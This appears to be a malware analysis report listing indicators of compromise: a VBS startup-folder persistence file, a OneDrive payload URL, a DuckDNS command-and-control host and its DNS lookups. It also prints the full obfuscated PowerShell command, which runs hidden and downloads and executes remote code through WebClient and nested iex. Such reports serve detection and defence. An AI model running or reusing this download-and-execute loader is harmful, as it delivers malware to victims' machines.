Technical information
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.vbs
- https://onedrive.live.com/download?cid=409b9a5b5f0f876c&resid=409b9a5b5f0f876c%213228&authkey=aje3jgmegwofwsu
- 'da#####85.duckdns.org':1985
- 'on####ve.live.com':443
- 'lh####.#y.files.1drv.com':443
- DNS ASK on####ve.live.com
- DNS ASK lh####.#y.files.1drv.com
- DNS ASK da#####85.duckdns.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit [Byte[]]$sc64= iex(iex('(&(GCM *W-O*)Net.WebClient).DownloadString(''https://onedrive.live.com/download?cid=409B9A5B5F0F876C&resid=409B9A5B5F0F876C%213228&authkey=AJe3JgmEGWOfwsU'')'));...' (with hidden window)